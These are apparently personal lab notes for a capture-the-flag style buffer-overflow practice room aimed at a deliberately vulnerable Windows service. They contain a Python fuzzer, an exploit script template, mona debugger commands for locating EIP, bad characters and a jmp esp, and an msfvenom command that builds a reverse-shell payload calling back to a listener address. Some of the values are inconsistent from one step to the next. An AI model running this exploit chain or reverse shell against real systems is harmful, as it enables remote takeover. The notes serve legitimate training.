# BufferOverflow Prep.



This room uses a 32-bit Windows 7 VM with Immunity Debugger and Putty preinstalled. Windows Firewall and Defender have both been disabled to make exploit writing easier.
### Connection to the machine 
Options:
- RDP
default - `xfreerdp /u:admin /p:password /cert:ignore /v:10.10.139.58 /workarea /tls-seclevel:0`
hammy - remina  
Run malware oscp.exe.
Then netcat to the vuln machine on port 1337  
          `nc $ip 1337`


NB: quick helpful link to go through of the walk through provided 
- `https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst`

###


### Set the mona working directory,

`
!mona config -set workingfolder c:\mona\buf5
`

### Fuzz the application and crash the program

When an application does not impose preventive checks to avoid data flooding, it is likely to be vulnerable to buffer overflows.

The fuzzing script

```
#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.118.155"

port = 1337
timeout = 5
prefix = "OVERFLOW3 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

Run the fuzzer.py script using python: python3 fuzzer.py



### Crash Replication & Controlling EIP

﻿Create another file on your Kali box called exploit.py with the following contents:

```
import socket

ip = "10.10.118.155"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):

`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600`
(Metasploit can create cyclic patterns for you. )

On Windows, in Immunity Debugger, re-open the oscp.exe again using the same method as before, and click the red play icon to get it running. You will have to do this prior to each time we run the exploit.py (which we will run multiple times with incremental modifications).

On Kali, run the modified exploit.py script: `python3 exploit.py`

The script should crash the oscp.exe server again. This time, in Immunity Debugger, in the command input box at the bottom of the screen, run the following mona command, changing the distance to the same length as the pattern you created:
mona in the debugger.
`!mona findmsp -distance 600`
/x001/x24/

### Finding Bad Characters

﻿Generate a bytearray using mona, and exclude the null byte (\x00) by default. Note the location of the bytearray.bin file that is generated (if the working folder was set per the Mona Configuration section of this guide, then the location should be C:\mona\oscp\bytearray.bin).

`!mona bytearray -b "\x00"`

Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff:
Create an array of 255 bytes using python program given below,
```
for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
```
overflow1 :
overflow2 : \x00\x23\x3c\x83\xba
overflow3 :
overflow4 : 
overflow5 :
overflow6 : 
overflow7 : 
overflow8 :
overflow9 :



Update your exploit.py script and set the payload variable to the string of bad chars the script generates.

Restart oscp.exe in Immunity and run the modified exploit.py script again. Make a note of the address to which the ESP register points and use it in the following mona command:

`!mona compare -f C:\mona\oscp\bytearray.bin -a <address>`

Rinse and repeat the process removing each bad chars and you will have a list at the end of it.
Its fun honestly. 

#### Finding a jump Point:
With the oscp.exe either running or in a crashed state, run the following mona command, making sure to update the -cpb option with all the badchars you identified (including \x00):

`!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"`

This command finds all "jmp esp" (or equivalent) instructions with addresses that don't contain any of the badchars specified. The results should display in the "Log data" window (use the Window menu to switch to it if needed).

Choose an address and update your exploit.py script, setting the "retn" variable to the address, written backwards (since the system is little endian). For example if the address is \x01\x02\x03\x04 in Immunity, write it as \x04\x03\x02\x01 in your exploit.




Lets create the exploit,

`msfvenom -p windows/shell_reverse_tcp LHOST=10.9.0.61 LPORT=4545 EXITFUNC=thread -b "\x00 \x16\x2f\xf4\xfd" -f python`


